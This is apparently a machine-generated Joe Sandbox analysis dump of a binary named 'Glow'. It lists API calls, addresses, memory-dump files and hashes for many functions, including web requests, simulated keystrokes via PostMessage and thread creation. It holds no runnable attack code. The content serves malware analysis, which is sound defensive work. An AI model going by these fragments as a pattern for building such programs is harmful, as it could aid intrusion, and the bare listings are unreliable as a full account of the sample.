                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                          • String ID: close all
                                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                                          • Opcode ID: a928c2c60a28196044f96d8ad1746984d51d630927bb8b2a3c6f08ed4abe3fd0
                                                                                                                                                                          • Instruction ID: ebd60ece1c35f1f514dc63d4a7971765a3047caaae31788b097decb04ba1627d
                                                                                                                                                                          • Opcode Fuzzy Hash: a928c2c60a28196044f96d8ad1746984d51d630927bb8b2a3c6f08ed4abe3fd0
                                                                                                                                                                          • Instruction Fuzzy Hash: ADD13C757012129FCB1AEF14C985F6AF7A4EF04710F1182EDE94AAB261CB31AD62CF44
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003F89F2
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8A06
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 003F8A30
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 003F8A4A
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8A5C
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8AA5
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003F8AF5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 769691225-438819550
                                                                                                                                                                          • Opcode ID: b5d73d5397072b21afbf5c8cdbcd2c0b5a10ea29ff797855300bc72733d1bb2c
                                                                                                                                                                          • Instruction ID: da94041d452c2f1816d3749855517a91b442ef9e44123dafb902eaa5d9634e60
                                                                                                                                                                          • Opcode Fuzzy Hash: b5d73d5397072b21afbf5c8cdbcd2c0b5a10ea29ff797855300bc72733d1bb2c
                                                                                                                                                                          • Instruction Fuzzy Hash: F481AF719043099BCB2AEF14C844ABBB3E8FF85310F55482EFA95DB250DF74D9458B92
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00418992
                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0041899E
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00418A79
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00418AAC
                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,00000000), ref: 00418AE4
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 00418B06
                                                                                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00418B1E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 4072528602-3218771753
                                                                                                                                                                          • Opcode ID: b0d930f690457f233f792e5edbf30a6b75babd5c0bef1f6ab0338da81fc77ad8
                                                                                                                                                                          • Instruction ID: ea564ade61fa479ce725d0ae07022f6e477167430a9d3da02ec19ec18e222eca
                                                                                                                                                                          • Opcode Fuzzy Hash: b0d930f690457f233f792e5edbf30a6b75babd5c0bef1f6ab0338da81fc77ad8
                                                                                                                                                                          • Instruction Fuzzy Hash: 21719BB4604204AFEB219F54C884FFBBBB9EF09340F14445FE945A7361CB39A981CB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 003874D7
                                                                                                                                                                            • Part of subcall function 00387567: GetClientRect.USER32(?,?), ref: 0038758D
                                                                                                                                                                            • Part of subcall function 00387567: GetWindowRect.USER32(?,?), ref: 003875CE
                                                                                                                                                                            • Part of subcall function 00387567: ScreenToClient.USER32(?,?), ref: 003875F6
                                                                                                                                                                          • GetDC.USER32 ref: 003C6083
                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003C6096
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 003C60A4
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 003C60B9
                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 003C60C1
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003C6152
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                          • String ID: U
                                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                                          • Opcode ID: d0d96564164479fd512c00a00bf582e71851e4558cde7f29a751ba60a2d10c19
                                                                                                                                                                          • Instruction ID: 8cb0867bd6d4c3a3b242a8c405e316c14b7a0606a4590e87acaefca24ff68a05
                                                                                                                                                                          • Opcode Fuzzy Hash: d0d96564164479fd512c00a00bf582e71851e4558cde7f29a751ba60a2d10c19
                                                                                                                                                                          • Instruction Fuzzy Hash: FE71AE31504205DFCF229F64CC86EAA7BB6FF49321F2942AEE9559A2A6C731CC40DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003FCCB7
                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003FCCDF
                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003FCD0F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003FCD67
                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 003FCD7B
                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 003FCD86
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                                                                                          • Opcode ID: 87e03e2b26928fa62aed8761b34688ebcffa184944e95e1d976fb5b28c2ecbb6
                                                                                                                                                                          • Instruction ID: ddd5f7302018af3665fd69a10d06cccd16dd38db2a7cba58878a4d96383cb7d2
                                                                                                                                                                          • Opcode Fuzzy Hash: 87e03e2b26928fa62aed8761b34688ebcffa184944e95e1d976fb5b28c2ecbb6
                                                                                                                                                                          • Instruction Fuzzy Hash: D331BCB195020CAFD722AF608E88ABF7BFCEB45740B00452AF64697250DB34ED049B64
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003C55AE,?,?,Bad directive syntax error,0041DCD0,00000000,00000010,?,?), ref: 003EA236
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,003C55AE,?), ref: 003EA23D
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003EA301
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                          • API String ID: 858772685-4153970271
                                                                                                                                                                          • Opcode ID: b6bf47f39a0942b122ce1108b7d3ea761108df7229a86197f3798f7bcada12c2
                                                                                                                                                                          • Instruction ID: d92678f344f4d2132d729f455dd5e6d6fde0045f66485892357198ec1884c9e7
                                                                                                                                                                          • Opcode Fuzzy Hash: b6bf47f39a0942b122ce1108b7d3ea761108df7229a86197f3798f7bcada12c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 95216F3180031AAFCF03BFA0CC06FEE7B79BF18304F044866B515691A2EB75AA18DB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32 ref: 003E29F8
                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 003E2A0D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003E2A9A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameParentSend
                                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                          • API String ID: 1290815626-3381328864
                                                                                                                                                                          • Opcode ID: 60af23be7165d804f8356394cdb89b09e4397cb382d5da3367f2a3c89a222723
                                                                                                                                                                          • Instruction ID: c0296fc89b7f63d02a672d6db266ddfe438e67f5219b53f09367747ec4424df8
                                                                                                                                                                          • Opcode Fuzzy Hash: 60af23be7165d804f8356394cdb89b09e4397cb382d5da3367f2a3c89a222723
                                                                                                                                                                          • Instruction Fuzzy Hash: AD1129B66843A7B9F6276222EC07DA7379CCF16724B320236F904F44D2FFA5A8004519
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0038758D
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 003875CE
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 003875F6
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0038773A
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0038775B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1296646539-0
                                                                                                                                                                          • Opcode ID: 6eac49a99ade90f36e545cba0f7bd4eaffa70491555bb5ea7f7130ed112562a3
                                                                                                                                                                          • Instruction ID: 1c04de50f9e185e39bf4a1f40d406be6324cf742a362347a5c7ab61464622066
                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac49a99ade90f36e545cba0f7bd4eaffa70491555bb5ea7f7130ed112562a3
                                                                                                                                                                          • Instruction Fuzzy Hash: 7CC1477990464AEBDB11DFA8C980BEDBBF5FF08310F24845AE899E3250D734E951DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1282221369-0
                                                                                                                                                                          • Opcode ID: ee6cf80be1b64c4640d86c91320a6c7631a041d770e993620062dc3951044db2
                                                                                                                                                                          • Instruction ID: 77ea7a88b55fad3975e7305850755ae37fd7e9df03f774f5e6ed967f4bd29c5b
                                                                                                                                                                          • Opcode Fuzzy Hash: ee6cf80be1b64c4640d86c91320a6c7631a041d770e993620062dc3951044db2
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F611671A04340AFDB23AF74D881BEA7BA49F01328F050A7DEB459FA92FA31D9008755
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00415C24
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00415C65
                                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 00415C6B
                                                                                                                                                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00415C6F
                                                                                                                                                                            • Part of subcall function 004179F2: DeleteObject.GDI32(00000000), ref: 00417A1E
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00415CAB
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00415CB8
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00415CEB
                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00415D25
                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00415D34
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3210457359-0
                                                                                                                                                                          • Opcode ID: 5d88dbdeec6428cfdff44ea5219853e7f7b600d2c7d23e3865d68e9e8135799f
                                                                                                                                                                          • Instruction ID: cb2935d2e5e7d597878a7ce6df8b2c80c14cc247ddcc0a3fadc1f995d70d4155
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d88dbdeec6428cfdff44ea5219853e7f7b600d2c7d23e3865d68e9e8135799f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A51DE30A40B18FFEF219F24CC49BDA3B65AB80354F108117F6249A2E1D779A9C0DB89
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003FCBC7
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003FCBDA
                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 003FCBEE
                                                                                                                                                                            • Part of subcall function 003FCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003FCCB7
                                                                                                                                                                            • Part of subcall function 003FCC98: GetLastError.KERNEL32 ref: 003FCD67
                                                                                                                                                                            • Part of subcall function 003FCC98: SetEvent.KERNEL32(?), ref: 003FCD7B
                                                                                                                                                                            • Part of subcall function 003FCC98: InternetCloseHandle.WININET(00000000), ref: 003FCD86
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 337547030-0
                                                                                                                                                                          • Opcode ID: 7a436a3c20420287ac570123cac0441a695110800ac86165e12cc2ae934b3eeb
                                                                                                                                                                          • Instruction ID: 7368f27db6e8f50f4a3ee17d22767d245d882d01273053a0c7926adb1006eb92
                                                                                                                                                                          • Opcode Fuzzy Hash: 7a436a3c20420287ac570123cac0441a695110800ac86165e12cc2ae934b3eeb
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B316DB555070DAFDB229FA1CE44AB6BBE8FF04300B04952DFA6A86610C731D815EB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E43AD
                                                                                                                                                                            • Part of subcall function 003E4393: GetCurrentThreadId.KERNEL32 ref: 003E43B4
                                                                                                                                                                            • Part of subcall function 003E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E2F00), ref: 003E43BB
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E2F0A
                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003E2F28
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003E2F2C
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E2F36
                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003E2F4E
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 003E2F52
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E2F5C
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003E2F70
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 003E2F74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                                          • Opcode ID: a20be729e4b18e17207fbf467b2bf985f0b90a2b942989a837bf31a3169e1c40
                                                                                                                                                                          • Instruction ID: 4bd4172d7b2d3009fb7213c7b79462ab7ba2a009bed95d88793da5da2b9922a6
                                                                                                                                                                          • Opcode Fuzzy Hash: a20be729e4b18e17207fbf467b2bf985f0b90a2b942989a837bf31a3169e1c40
                                                                                                                                                                          • Instruction Fuzzy Hash: AB01D8707842247BFB1067699C8AF997F5DDB4DB11F104021F318AE1E4C9E154448AAD
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,003E1D95,?,?,00000000), ref: 003E2159
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,003E1D95,?,?,00000000), ref: 003E2160
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003E1D95,?,?,00000000), ref: 003E2175
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,003E1D95,?,?,00000000), ref: 003E217D
                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,003E1D95,?,?,00000000), ref: 003E2180
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003E1D95,?,?,00000000), ref: 003E2190
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(003E1D95,00000000,?,003E1D95,?,?,00000000), ref: 003E2198
                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,003E1D95,?,?,00000000), ref: 003E219B
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,003E21C1,00000000,00000000,00000000), ref: 003E21B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1957940570-0
                                                                                                                                                                          • Opcode ID: 40ab81c74d61d0c30e47eb1bdbe558a81a8f1c12c30aefc7a2efdc61115c7ff3
